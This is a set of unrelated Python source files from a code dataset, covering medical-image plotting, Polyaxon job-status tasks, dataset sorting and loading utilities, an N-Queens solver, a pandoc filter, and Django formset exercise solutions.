np.load('C:\\MPhys\\\\Data\\\\PCA results\\\\Panc01StomachCropMagnitudePCAcube.npy');\nmag_pca_result_cube = np.load('C:\\MPhys\\\\Data\\\\Intra Patient\\\\Stomach\\\\PCA\\\\pcaMagStomach04.npy');\n\n\n# Read in the delineation nifti files using nibabel\n#stomach = nib.load('C:\\MPhys\\\\stomach.nii');\nstomach = nib.load('C:\\MPhys\\\\Data\\\\Intra Patient\\\\Stomach\\\\Stomach04\\\\stomachMask.nii')\nstomachHdr = stomach.header;\nstomachData = stomach.get_fdata();\n\n# numpy array conversion\n# stom = np.rot90(np.rot90(np.array(stomachData),2,(0,2)),1,(1,2));\nstom = np.array(stomachData);\n\n##################### functions ###############################\n\ndef tri_indices(faces):\n #simplices is a numpy array defining the simplices of the triangularization\n #returns the lists of indices i, j, k\n\n return ([triplet[c] for triplet in faces] for c in range(3))\n\n# Use marching cubes to obtain the surface mesh of the stomach/stomach PRV delineations\n# input 3d volume - masking data form WM\nverts, faces, normals, values = measure.marching_cubes_lewiner(stom, 50) # note to self:check masking boudaries in lua code - CHECKED eh\nx,y,z = zip(*verts)\n#i,j,k = zip(*faces)\n\n\n################ create trisurf plot #########################\n\n# Use marching cubes to obtain the surface mesh of the stomach/stomach PRV delineations\n# input 3d volume - masking data form WM\nverts, faces, normals, values = measure.marching_cubes_lewiner(stom, 50)\nX3,Y3,Z3 = zip(*verts)\nX3 = np.array(X3)\nY3 = np.array(Y3)\nZ3 = np.array(Z3)\n\n# find the PCA vector values that correspond with mesh vertices and put the values that match the rounded vertex values into an array\n# The program scales the values itself so all it needs is a value per vertex and a colour map to assign it too.\ndef vertexColour(x,y,z):\n coloursMag = np.ndarray(shape = (verts.shape[0]))\n\n for x2 in range(verts.shape[0]):\n coloursMag[x2] = mag_pca_result_cube[np.around(x).astype(int),np.around(y).astype(int),np.around(z).astype(int),0];\n \n return coloursMag\n\ndata = ff.create_trisurf(x=X3, y=Y3, z=Z3, simplices = faces, colormap = 'YlOrRd', \n color_func = vertexColour, show_colorbar = True\n )\n \n\nfig3 = go.Figure(data=data)\nfig3['layout'].update(dict(title= ' Stomach04 - PCA Magnitudes',\n width=1000,\n height=1000,\n scene=dict(\n aspectratio=dict(x=1, y=1, z=0.7),\n camera=dict(eye=dict(x=1.25, y=1.25, z= 1.25)\n )\n )\n ))\n\npy.plot(fig3, filename = 'Stomach04 - PCA Magnitudes.html')\n","sub_path":"Old/Ploty_isosurface_v2.py","file_name":"Ploty_isosurface_v2.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"335414619","text":"from django.conf import settings\nfrom django.db import IntegrityError\n\nfrom db.models.build_jobs import BuildJob\nfrom db.models.experiment_jobs import ExperimentJob\nfrom db.models.experiments import Experiment\nfrom db.models.jobs import Job\nfrom db.models.notebooks import NotebookJob\nfrom db.models.projects import Project\nfrom db.models.tensorboards import TensorboardJob\nfrom k8s_events_handlers.tasks.logger import logger\nfrom polyaxon.celery_api import celery_app\nfrom polyaxon.settings import Intervals, K8SEventsCeleryTasks\n\n\ndef set_node_scheduling(job, node_name):\n if job.node_scheduled or node_name is None:\n return\n job.node_scheduled = node_name\n job.save(update_fields=['node_scheduled'])\n\n\n@celery_app.task(name=K8SEventsCeleryTasks.K8S_EVENTS_HANDLE_EXPERIMENT_JOB_STATUSES,\n bind=True,\n max_retries=3,\n ignore_result=True)\ndef k8s_events_handle_experiment_job_statuses(self, payload):\n \"\"\"Experiment jobs statuses\"\"\"\n details = payload['details']\n job_uuid = details['labels']['job_uuid']\n logger.debug('handling events status for job_uuid: %s, status: %s',\n job_uuid, payload['status'])\n\n try:\n job = ExperimentJob.objects.get(uuid=job_uuid)\n except ExperimentJob.DoesNotExist:\n logger.debug('Job uuid`%s` does not exist', job_uuid)\n return\n\n try:\n job.experiment\n except Experiment.DoesNotExist:\n logger.debug('Experiment for job `%s` does not exist anymore', job_uuid)\n return\n\n if job.last_status is None and self.request.retries < 2:\n self.retry(countdown=1)\n\n # Set the new status\n try:\n set_node_scheduling(job, details['node_name'])\n job.set_status(status=payload['status'],\n message=payload['message'],\n traceback=payload.get('traceback'),\n details=details)\n logger.debug('status %s is set for job %s %s', payload['status'], job_uuid, job.id)\n except IntegrityError:\n # Due to concurrency this could happen, we just retry it\n logger.info('Retry job status %s handling %s', payload['status'], job_uuid)\n self.retry(countdown=Intervals.EXPERIMENTS_SCHEDULER)\n\n\n@celery_app.task(name=K8SEventsCeleryTasks.K8S_EVENTS_HANDLE_JOB_STATUSES,\n bind=True,\n max_retries=3,\n ignore_result=True)\ndef k8s_events_handle_job_statuses(self, payload):\n \"\"\"Project jobs statuses\"\"\"\n details = payload['details']\n job_uuid = details['labels']['job_uuid']\n job_name = details['labels']['job_name']\n project_name = details['labels'].get('project_name')\n logger.debug('handling events status for job %s', job_name)\n\n try:\n job = Job.objects.get(uuid=job_uuid)\n except Job.DoesNotExist:\n logger.debug('Job `%s` does not exist', job_name)\n return\n\n try:\n job.project\n except Project.DoesNotExist:\n logger.debug('Project for job `%s` does not exist', project_name)\n return\n\n # Set the new status\n try:\n set_node_scheduling(job, details['node_name'])\n job.set_status(status=payload['status'],\n message=payload['message'],\n traceback=payload.get('traceback'),\n details=details)\n except IntegrityError:\n # Due to concurrency this could happen, we just retry it\n self.retry(countdown=Intervals.EXPERIMENTS_SCHEDULER)\n\n\n@celery_app.task(name=K8SEventsCeleryTasks.K8S_EVENTS_HANDLE_PLUGIN_JOB_STATUSES,\n bind=True,\n max_retries=3,\n ignore_result=True)\ndef k8s_events_handle_plugin_job_statuses(self, payload):\n \"\"\"Project Plugin jobs statuses\"\"\"\n details = payload['details']\n app = details['labels']['app']\n job_uuid = details['labels']['job_uuid']\n job_name = details['labels']['job_name']\n project_name = details['labels'].get('project_name')\n logger.debug('handling events status for job %s %s', job_name, app)\n\n try:\n if app == settings.APP_LABELS_TENSORBOARD:\n job = TensorboardJob.objects.get(uuid=job_uuid)\n elif app == settings.APP_LABELS_NOTEBOOK:\n job = NotebookJob.objects.get(uuid=job_uuid)\n else:\n logger.info('Plugin job `%s` does not exist', app)\n return\n except (NotebookJob.DoesNotExist, TensorboardJob.DoesNotExist):\n logger.debug('`%s - %s` does not exist', app, job_name)\n return\n\n try:\n job.project\n except Project.DoesNotExist:\n logger.debug('`%s` does not exist anymore', project_name)\n\n # Set the new status\n try:\n set_node_scheduling(job, details['node_name'])\n job.set_status(status=payload['status'],\n message=payload['message'],\n traceback=payload.get('traceback'),\n details=details)\n except IntegrityError:\n # Due to concurrency this could happen, we just retry it\n self.retry(countdown=Intervals.EXPERIMENTS_SCHEDULER)\n\n\n@celery_app.task(name=K8SEventsCeleryTasks.K8S_EVENTS_HANDLE_BUILD_JOB_STATUSES,\n bind=True,\n max_retries=3,\n ignore_result=True)\ndef k8s_events_handle_build_job_statuses(self, payload):\n \"\"\"Project Plugin jobs statuses\"\"\"\n details = payload['details']\n app = details['labels']['app']\n job_uuid = details['labels']['job_uuid']\n job_name = details['labels']['job_name']\n project_name = details['labels'].get('project_name')\n logger.debug('handling events status for build jon %s %s', job_name, app)\n\n try:\n build_job = BuildJob.objects.get(uuid=job_uuid)\n except BuildJob.DoesNotExist:\n logger.info('Build job `%s` does not exist', job_name)\n return\n\n try:\n build_job.project\n except Project.DoesNotExist:\n logger.debug('`%s` does not exist anymore', project_name)\n\n # Set the new status\n try:\n set_node_scheduling(build_job, details['node_name'])\n build_job.set_status(status=payload['status'],\n message=payload['message'],\n traceback=payload.get('traceback'),\n details=details)\n except IntegrityError:\n # Due to concurrency this could happen, we just retry it\n self.retry(countdown=Intervals.EXPERIMENTS_SCHEDULER)\n","sub_path":"polyaxon/k8s_events_handlers/tasks/statuses.py","file_name":"statuses.py","file_ext":"py","file_size_in_byte":6472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"91775983","text":"import logging\n\n# filter\n# logger.addFilter()\n# format\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nf_handler = logging.FileHandler('/var/log/test.log',mode='a')\ns_handler = logging.StreamHandler()\n\nf_handler.setFormatter(formatter)\ns_handler.setFormatter(formatter)\nlevel = logging.DEBUG \nlogger = logging.getLogger(\"main\")\nlogger.setLevel(level)\nlogger.addHandler(f_handler)\nlogger.addHandler(s_handler)\n\nlogger.warning('warning')\n","sub_path":"python/oreilly/logging_t.py","file_name":"logging_t.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"646712140","text":"import os\nimport shutil\nimport csv\n\ndef copiarArquivosPositivos(src, dst, counter, symlinks = False, ignore = None):\n for arquivo in os.listdir(src):\n novoArquivoDividido = arquivo.split('.')\n s = os.path.join(src, arquivo)\n d = os.path.join(dst, 'positivo.' + str(counter) + '.' + novoArquivoDividido[1])\n if os.path.isdir(s):\n print('Diretório encontrado')\n else:\n shutil.copy2(s, d)\n counter += 1 \n return counter \n\ndef copiarArquivosNegativos(src, dst, counter, symlinks = False, ignore = None):\n for arquivo in os.listdir(src):\n novoArquivoDividido = arquivo.split('.')\n s = os.path.join(src, arquivo)\n d = os.path.join(dst, 'negativo.' + str(counter) + '.' + novoArquivoDividido[1])\n if os.path.isdir(s):\n print('Diretório encontrado')\n else:\n shutil.copy2(s, d)\n counter += 1\n return counter\n\ndef main():\n with open('MURA-v1.1/train_labeled_studies.csv') as arquivo_csv:\n leitor_csv = csv.reader(arquivo_csv, delimiter = ',')\n contador_de_linhas = 0\n\n contador_positivo_xr_elbow = 1\n contador_negativo_xr_elbow = 1\n\n contador_positivo_xr_finger = 1\n contador_negativo_xr_finger = 1\n\n contador_positivo_xr_forearm = 1\n contador_negativo_xr_forearm = 1\n\n contador_positivo_xr_hand = 1\n contador_negativo_xr_hand = 1\n\n contador_positivo_xr_humerus = 1\n contador_negativo_xr_humerus = 1\n\n contador_positivo_xr_shoulder = 1\n contador_negativo_xr_shoulder = 1\n\n contador_positivo_xr_wrist = 1\n contador_negativo_xr_wrist = 1\n\n for linha in leitor_csv:\n contador_de_linhas += 1\n \n linhaDividida = linha[0].split('/')\n \n if(linhaDividida[2] == 'XR_ELBOW'):\n if(linha[1] == '1'): # Caso Positivo\n print(f'\\t Pasta: {linha[0]} - Positivo')\n contador_positivo_xr_elbow = copiarArquivosPositivos(linha[0], 'datasets/XR_ELBOW/dataset_treino/positivo', contador_positivo_xr_elbow, False, None)\n if(linha[1] == '0'): # Caso Negativo\n print(f'\\t Pasta: {linha[0]} - Negativo')\n contador_negativo_xr_elbow = copiarArquivosNegativos(linha[0], 'datasets/XR_ELBOW/dataset_treino/negativo', contador_negativo_xr_elbow, False, None)\n\n if(linhaDividida[2] == 'XR_FINGER'): \n if(linha[1] == '1'): # Caso Positivo\n print(f'\\t Pasta: {linha[0]} - Positivo')\n copiarArquivosPositivos(linha[0], 'datasets/XR_FINGER/dataset_treino/positivo', contador_positivo_xr_finger, False, None)\n if(linha[1] == '0'): # Caso Negativo\n print(f'\\t Pasta: {linha[0]} - Negativo')\n copiarArquivosNegativos(linha[0], 'datasets/XR_FINGER/dataset_treino/negativo', contador_negativo_xr_finger, False, None) \n \n if(linhaDividida[2] == 'XR_FOREARM'):\n if(linha[1] == '1'): # Caso Positivo\n print(f'\\t Pasta: {linha[0]} - Positivo')\n contador_positivo_xr_forearm = copiarArquivosPositivos(linha[0], 'datasets/XR_FOREARM/dataset_treino/positivo', contador_positivo_xr_forearm , False, None)\n if(linha[1] == '0'): # Caso Negativo\n print(f'\\t Pasta: {linha[0]} - Negativo')\n contador_negativo_xr_forearm = copiarArquivosNegativos(linha[0], 'datasets/XR_FOREARM/dataset_treino/negativo', contador_negativo_xr_forearm, False, None)\n\n if(linhaDividida[2] == 'XR_HAND'):\n if(linha[1] == '1'): # Caso Positivo\n print(f'\\t Pasta: {linha[0]} - Positivo')\n contador_positivo_xr_hand = copiarArquivosPositivos(linha[0], 'datasets/XR_HAND/dataset_treino/positivo', contador_positivo_xr_hand , False, None)\n if(linha[1] == '0'): # Caso Negativo\n print(f'\\t Pasta: {linha[0]} - Negativo')\n contador_negativo_xr_hand = copiarArquivosNegativos(linha[0], 'datasets/XR_HAND/dataset_treino/negativo', contador_negativo_xr_hand, False, None)\n\n if(linhaDividida[2] == 'XR_HUMERUS'):\n if(linha[1] == '1'): # Caso Positivo\n print(f'\\t Pasta: {linha[0]} - Positivo')\n contador_positivo_xr_humerus = copiarArquivosPositivos(linha[0], 'datasets/XR_HUMERUS/dataset_treino/positivo', contador_positivo_xr_humerus, False, None)\n if(linha[1] == '0'): # Caso Negativo\n print(f'\\t Pasta: {linha[0]} - Negativo')\n contador_negativo_xr_humerus = copiarArquivosNegativos(linha[0], 'datasets/XR_HUMERUS/dataset_treino/negativo', contador_negativo_xr_humerus, False, None)\n\n if(linhaDividida[2] == 'XR_SHOULDER'):\n if(linha[1] == '1'): # Caso Positivo\n print(f'\\t Pasta: {linha[0]} - Positivo')\n contador_positivo_xr_shoulder = copiarArquivosPositivos(linha[0], 'datasets/XR_SHOULDER/dataset_treino/positivo', contador_positivo_xr_shoulder, False, None)\n if(linha[1] == '0'): # Caso Negativo\n print(f'\\t Pasta: {linha[0]} - Negativo')\n contador_negativo_xr_shoulder = copiarArquivosNegativos(linha[0], 'datasets/XR_SHOULDER/dataset_treino/negativo', contador_negativo_xr_shoulder, False, None)\n\n if(linhaDividida[2] == 'XR_WRIST'):\n if(linha[1] == '1'): # Caso Positivo\n print(f'\\t Pasta: {linha[0]} - Positivo')\n contador_positivo_xr_wrist = copiarArquivosPositivos(linha[0], 'datasets/XR_WRIST/dataset_treino/positivo', contador_positivo_xr_wrist, False, None)\n if(linha[1] == '0'): # Caso Negativo\n print(f'\\t Pasta: {linha[0]} - Negativo')\n contador_negativo_xr_wrist = copiarArquivosNegativos(linha[0], 'datasets/XR_WRIST/dataset_treino/negativo', contador_negativo_xr_wrist, False, None)\n \n print(f'Total de linhas processadas: {contador_de_linhas}')\n arquivo_csv.close()\n\nif __name__ == '__main__':\n main()","sub_path":"ajuste_dataset_treino.py","file_name":"ajuste_dataset_treino.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"184472406","text":"import os\nfrom collections import Counter\n\nimport numpy as np\nfrom sklearn.base import BaseEstimator\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.utils.validation import check_X_y, check_array, check_is_fitted\n\n\nclass NormBagOfWords(BaseEstimator):\n\n def __init__(self, nGram=1, gamma=1):\n self.nGram_ = nGram\n self.gamma_ = gamma\n\n def hlim_w_(self, x):\n return range(len(x)-self.nGram_+1)\n\n def get_ngrams_(self, x, i):\n return ' '.join(x[i:i+self.nGram_])\n\n def toNGrams_(self, X):\n newX = []\n for x in X:\n newX.append(list(map(lambda i: self.get_ngrams_(x, i), self.hlim_w_(x))))\n return newX\n\n def check_bounds(self, x, low, high):\n return self.freqs_[x] >= low and self.freqs_[x] <= high\n\n def check_args(self, low, high):\n if high < low:\n print(' !BagOfWords : low bound must be lower than higher bound')\n raise ValueError\n\n def cutGrams_(self, X, low, high):\n newX = []\n for x in X:\n newX.append(list(filter(lambda gs: self.check_bounds(gs, low, high), x)))\n return newX\n\n def fit(self, X):\n self.freqs_ = Counter()\n for x in X:\n for i in self.hlim_w_(x):\n ngram = self.get_ngrams_(x, i)\n self.freqs_[ngram] += 1\n self.nbGrams_ = len(self.freqs_)\n return self\n\n def getFreq_(self, x):\n if x in self.freqs_:\n return self.freqs_[x]\n else:\n return 0\n\n def getFreqs(self, X):\n check_is_fitted(self, ['freqs_'])\n ret = []\n for x in X:\n ret.append(self.getFreq_(x))\n return ret\n\n def transform(self, X, low=0, high=-1, ret_dict=False):\n # regarder si le model a été ajusté\n check_is_fitted(self, ['freqs_'])\n\n if high > 0:\n self.check_args(low, high)\n newX = self.cutGrams_(self.toNGrams_(X), low, high)\n else:\n newX = self.toNGrams_(X)\n\n grams = set()\n\n for x in newX:\n grams |= set(x)\n\n grams2id = {g: i for i, g in enumerate(grams)}\n id2grams = {i: g for i, g in enumerate(grams)}\n\n vectorX = np.zeros((len(newX), len(grams)))\n\n for i, x in enumerate(newX):\n for g in x:\n vectorX[i,grams2id[g]] += 1 / (self.gamma_*self.freqs_[g])\n\n vectorX[vectorX != 0] = np.log(vectorX[vectorX != 0])\n vectorX = MinMaxScaler().fit_transform(vectorX)\n\n if ret_dict:\n return vectorX, id2grams\n else:\n return vectorX\n\n def transform_cut(self, X, low=0, high=-1):\n # regarder si le model a été ajusté\n check_is_fitted(self, ['freqs_'])\n\n if high > 0:\n self.check_args(low, high)\n newX = self.cutGrams_(self.toNGrams_(X), low, high)\n return newX\n else:\n newX = self.toNGrams_(X)\n return newX\n","sub_path":"src/bow/normBagOfWords.py","file_name":"normBagOfWords.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"179075894","text":"import pandas as pd\nimport os\nimport collections\n\nclass BaseDataset(object):\n\n def list_metrics(self):\n raise NotImplementedError()\n\n def list_hosts(self, metric):\n raise NotImplementedError()\n\n def get_dataframe(self, metric, host, time_from='2018-01-01 00:00:00', time_till='2019-01-01 00:00:00'):\n raise NotImplementedError()\n\n def get_timeseries(self, metric, host):\n raise NotImplementedError()\n\nclass CSVDataset(BaseDataset):\n def __init__(self):\n DATASET_DIR = 'sample_dataset'\n curr_path = os.path.dirname(os.path.abspath(__file__))\n self.dataset_path = os.path.join(curr_path, DATASET_DIR)\n\n def list_metrics(self):\n metrics = []\n for filename in os.listdir(self.dataset_path):\n counter_filename = collections.Counter(filename)\n if counter_filename['.'] == 2 and filename.endswith('.csv'):\n metrics.append(filename.split('.')[0])\n return list(set(metrics))\n\n def list_hosts(self, metric):\n hosts = []\n for filename in os.listdir(self.dataset_path):\n if filename.startswith(metric):\n counter_filename = collections.Counter(filename)\n if counter_filename['.'] == 2 and filename.endswith('.csv'):\n hosts.append(filename.split('.')[1])\n return list(set(hosts))\n\n def get_file_name(self, metric, host):\n return os.path.join(self.dataset_path, '{}.{}.csv'.format(metric, host))\n\n def get_dataframe(self, metric, host, time_from=None, time_till=None):\n file_name = self.get_file_name(metric, host)\n return pd.read_csv(file_name)\n\n def get_timeseries(self, metric, host, time_from=None, time_till=None):\n df = self.get_dataframe(metric, host, time_from, time_till)\n df.set_index('time', inplace=True)\n return df['value']\n\n def timeserie_to_csv(self, metric, host, datapoints):\n file_name = self.get_file_name(metric, host)\n datapoints.to_csv(file_name, index=False)\n\n\nclass JSONDataset(BaseDataset):\n def __init__(self):\n DATASET_DIR = 'json_dataset'\n curr_path = os.path.dirname(os.path.abspath(__file__))\n self.dataset_path = os.path.join(curr_path, DATASET_DIR)\n\n def save_metric_datpoints(self, metric):\n influx_dataset = InfluxDBDataset()\n metric_index = 0\n\n hosts = influx_dataset.list_hosts_small_names(metric)\n for host in hosts:\n file_name = os.path.join(self.dataset_path, '{}_{}.json'.format(metric, host))\n file = open(file_name, 'w')\n datapoints = influx_dataset.get_timeserie(metric, host)\n for index, row in datapoints.iterrows():\n metric_index += 1\n file.write('{\"index\": {\"_index\":\"zabbix_metrics_%s\",\"_type\":\"%s\",\"_id\":\"%s\"}}\\n' % (metric, metric, str(metric_index)))\n file.write('{\"@timestamp\":\"%s\",\"host_name\":\"%s\",\"value\":%s}\\n' % (str(row['time'].strftime(\"%Y-%m-%dT%H:%M:%S\")), host, str(row['value'])))\n file.close()\n\ndef save_all_metrics(self):\n influx_dataset = InfluxDBDataset()\n metrics = influx_dataset.list_metrics()\n for metric in metrics:\n self.save_metric_datpoints(metric)\n\nclass InfluxDBDataset(BaseDataset):\n def __init__(self):\n from influxdb import InfluxDBClient\n influxdb_host = 'localhost'\n influxdb_port = 8086\n influx_database= 'metricas_hist'\n self.influxdb_client = InfluxDBClient(host=influxdb_host, port=influxdb_port, database=influx_database)\n\n def list_metrics(self):\n metrics = []\n sql = \"show measurements\"\n ret_df = self.influxdb_client.query(sql)\n for item in ret_df['measurements']:\n metrics.append(item['name'])\n return metrics\n\n def list_hosts(self, metric):\n hosts = []\n sql = \"SHOW TAG VALUES with key = host_name\"\n ret_df = self.influxdb_client.query(sql)\n for item in ret_df[metric]:\n hosts.append(item['value'])\n return hosts\n\n def list_hosts_small_names(self, metric):\n hosts = []\n sql = \"SHOW TAG VALUES with key = host_name\"\n ret_df = self.influxdb_client.query(sql)\n for item in ret_df[metric]:\n hostname = item['value']\n if len(hostname) < 19:\n hosts.append(hostname)\n return hosts\n\n def get_dataframe(self, metric, host, time_from='2018-01-01 00:00:00', time_till='2019-01-01 00:00:00'):\n\n sql = \"\"\"SELECT time, value\n FROM {}\n WHERE host_name = '{}'\n AND time >= '{}'\n AND time <= '{}'\n \"\"\".format(metric, host, time_from, time_till)\n result_set = self.influxdb_client.query(sql)\n time = []\n value = []\n for item in result_set.get_points():\n time.append(item['time'])\n value.append(item['value'])\n my_dataframe = pd.DataFrame(\n {'time': time,\n 'value': value\n })\n my_dataframe['time'] = pd.to_datetime(my_dataframe['time'])\n return my_dataframe\n\n def get_timeseries(self, metric, host, time_from='2018-01-01 00:00:00', time_till='2019-01-01 00:00:00'):\n df = self.get_dataframe(metric, host, time_from, time_till)\n df.set_index('time', inplace=True)\n return df['value']\n\n\n def get_metric_timeserie(self, metric):\n sql = \"select time, host_name, value from {}\".format(metric)\n result_set = self.influxdb_client.query(sql)\n time = []\n host_name = []\n value = []\n for item in result_set.get_points():\n time.append(item['time'])\n host_name.append(item['host_name'])\n value.append(item['value'])\n my_dataframe = pd.DataFrame(\n {'time': time,\n 'host_name': host_name,\n 'value': value\n })\n my_dataframe['time'] = pd.to_datetime(my_dataframe['time'])\n return my_dataframe\n","sub_path":"apps/mestrado_projeto_anomalias/util/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":6074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"230913914","text":"class Solution:\n def solveNQueens(self, N: int) -> List[List[str]]:\n ans = []\n board = [['.'] * N for _ in range(N)]\n\n def place(i: int, vert: int, ldiag: int, rdiag: int) -> None:\n if i == N:\n ans.append([\"\".join(row) for row in board])\n return\n for j in range(N):\n vmask, lmask, rmask = 1 << j, 1 << (i+j), 1 << (N-i-1+j)\n if vert & vmask or ldiag & lmask or rdiag & rmask:\n continue\n board[i][j] = 'Q'\n place(i+1, vert | vmask, ldiag | lmask, rdiag | rmask)\n board[i][j] = '.'\n\n place(0, 0, 0, 0)\n return ans\n","sub_path":"May LeetCoding Chanllenge 2021/22 N-Queens/N-Queens.py","file_name":"N-Queens.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"117470583","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nimport re\n\nfrom pandocfilters import toJSONFilter, stringify, get_caption, RawInline, Str, Space, Table, Plain, OrderedList, BulletList, Math, Cite\n\ndef inlatex(s):\n\treturn RawInline('latex', s)\n\ndef get_label(label):\n\tif ':' in label:\n\t\treftype = label.split(':')[0]\n\t\tif reftype == 'sec' or reftype == 'section':\n\t\t\trefcommand = 'jsecref'\n\t\telif reftype == 'eq' or reftype == 'equation':\n\t\t\trefcommand = 'jeqref'\n\t\telif reftype == 'fig' or reftype == 'figure':\n\t\t\trefcommand = 'jfigref'\n\t\telif reftype == 'tbl' or reftype == 'table':\n\t\t\trefcommand = 'jtblref'\n\t\telif reftype == 'theo' or reftype == 'theorem':\n\t\t\trefcommand = 'jtheoref'\n\t\telif reftype == 'def' or reftype == 'definition':\n\t\t\trefcommand = 'jdefref'\n\t\telif reftype == 'exam' or reftype == 'example':\n\t\t\trefcommand = 'jexamref'\n\t\telse:\n\t\t\trefcommand = 'ref'\n\telse:\n\t\trefcommand = 'cite'\n\treturn(inlatex(\"\\\\%s{%s}\" % (refcommand,label)))\n\nclass PandocContents():\n\tdef __init__(self, str):\n\t\tself.contents = list()\n\t\tself.id = None\n\t\tself.classes = list()\n\t\tself.keyvals = dict()\n\t\tattr = re.compile('\\{(.+?)\\}')\n\t\tattrs = ' '.join(attr.findall(str)).split(' ')\n\t\tfor att in attrs:\n\t\t\tif att.startswith('#'):\n\t\t\t\tself.id = att[1:]\n\t\t\telif att.startswith('.'):\n\t\t\t\tself.classes.append(att[1:])\n\t\t\telif '=' in att:\n\t\t\t\tkeyvals = att.split(\"=\")\n\t\t\t\tself.keyvals[keyvals[0]] = keyvals[1]\n\t\tref = re.compile('\\[@(.+?)\\]')\n\t\tfor c in re.split('\\s+', attr.sub('', str).strip()):\n\t\t\tif len(c) == 0:\n\t\t\t\tpass\n\t\t\tif len(self.contents) > 0:\n\t\t\t\tself.contents.append(Space())\n\t\t\tstart = 0\n\t\t\tend = len(c)\n\t\t\twhile start < end:\n\t\t\t\ttref = ref.search(c, start, end)\n\t\t\t\tif tref is None:\n\t\t\t\t\tself.contents.append(Str(c[start:end]))\n\t\t\t\t\tstart = end\n\t\t\t\telse:\n\t\t\t\t\tif tref.start() > start:\n\t\t\t\t\t\tself.contents.append(Str(c[start:tref.start()]))\n\t\t\t\t\tlabel = ref.split(c[tref.start():tref.end()])[1]\n\t\t\t\t\tself.contents.append(get_label(label))\n\t\t\t\t\tstart = tref.end()\n\t\treturn\n\tdef get_contents_with_label(self):\n\t\tcontents = self.contents[:]\n\t\tif self.id is not None:\n\t\t\tcontents.append(inlatex(\"\\\\label{%s}\" % self.id))\n\t\tif len(contents) == 0:\n\t\t\treturn []\n\t\treturn contents\n\ndef pandocfilter(key, value, fmt, meta):\n\tif key == 'Table':\n\t\t[caption, alignment, data, header, rows] = value\n\t\tif len(caption) == 0:\n\t\t\treturn\n\t\tcaption = PandocContents(stringify(caption))\n\t\treturn [Table(caption.get_contents_with_label(), alignment, data, header, rows)]\n\telif key == 'Math' and value[0][\"t\"] == 'DisplayMath':\n\t\t[mathtype, mathcode] = value\n\t\tattr = re.compile('\\{#(.+?)\\}')\n\t\tif attr.search(mathcode) is None:\n\t\t\treturn\n\t\tlabels = attr.findall(mathcode)\n\t\tfor l in labels:\n\t\t\tml = r\"\\\\\\\\label{%s}\" % l\n\t\t\tmathcode = attr.sub(ml, mathcode, count=1)\n\t\treturn [Math(mathtype, mathcode)]\n\telif key == 'Cite':\n\t\tret = list()\n\t\t[citeinfo, contents] = value\n\t\tfor ci in citeinfo:\n\t\t\tlabel = ci['citationId']\n\t\t\tret.append(get_label(label))\n\t\tif len(ret) > 0:\n\t\t\treturn ret\n\ndef main():\n\ttoJSONFilter(pandocfilter)\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"filters/crossref_bw.py","file_name":"crossref_bw.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"187639824","text":"#============= PART 1 ===============\n# Challenge Task 1 of 2\n# Creating products one at a time is getting tedious. I want to be able to make multiple at a time.\n# In forms.py, create a model formset factory for the Digital model. Include the same fields as the DigitalProductForm. Name the factory DigitalFormset.\n\n\nfrom django import forms\n\nfrom . import models\n\n\nclass DigitalProductForm(forms.ModelForm):\n class Meta:\n model = models.Digital\n fields = ['name', 'description', 'url']\n\nDigitalFormset = forms.modelformset_factory(\n models.Digital,\n form = DigitalProductForm\n)\n\n\n# Challenge Task 2 of 2\n# Great! That's definitely going to help. Can you go one step further, though?\n\n# I want to be able to make five (5) products at a time. Can you set extra and max_num to both be 5?\n\n\nfrom django import forms\n\nfrom . import models\n\n\nclass DigitalProductForm(forms.ModelForm):\n class Meta:\n model = models.Digital\n fields = ['name', 'description', 'url']\n\nDigitalFormset = forms.modelformset_factory(\n models.Digital,\n form = DigitalProductForm,\n extra = 5,\n max_num = 5\n)\n\n#============= PART 2 ===============\n# Challenge Task 1 of 1\n# Now that we have a solid formset factory, we need to use it in a view.\n\n# I've already set up a view, bulk_create_product, but it doesn't do anything on POST requests.\n\n# Update the view so that POST requests, if valid, populate and save the formset. After saving, it should return a redirect to the URL named \"products:bulk_create\".\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\n\nfrom . import forms\n\n\ndef product_form(request):\n form = forms.DigitalProductForm()\n if request.method == 'POST':\n form = forms.DigitalProductForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('products:create'))\n return render(request, 'products/product_form.html', {'form': form})\n\n\ndef bulk_create_products(request):\n formset = forms.DigitalFormset()\n if request.method == 'POST':\n formset = forms.DigitalFormset(request.POST)\n if formset.is_valid():\n formset.save()\n return HttpResponseRedirect(reverse('products:bulk_create'))\n return render(request, 'products/bulk_create.html', {'formset': formset})\n\n#============= PART 3 ===============\n\n\n# Challenge Task 1 of 2\n# I want to be able to create a Review in the same form as where I create a Product. That means I need an inline form!\n\n# Create an inline model formset factory, named ReviewFormset, for the Review model. You need to include all the same fields as the existing ReviewForm.\n\n# Remember, the first argument to the factory is the parent model (Product) and the second is the model the factory is for (Review).\n\nfrom django import forms\n\nfrom . import models\nfrom products.models import Product\n\n\nclass ReviewForm(forms.ModelForm):\n class Meta:\n model = models.Review\n fields = ('headline', 'rating', 'content', 'writer', 'publish_date')\n\nReviewFormset = forms.inlineformset_factory(\n models.Product,\n models.Review,\n fields = ('headline', 'rating', 'content', 'writer', 'publish_date')\n)\n\n\n# Challenge Task 2 of 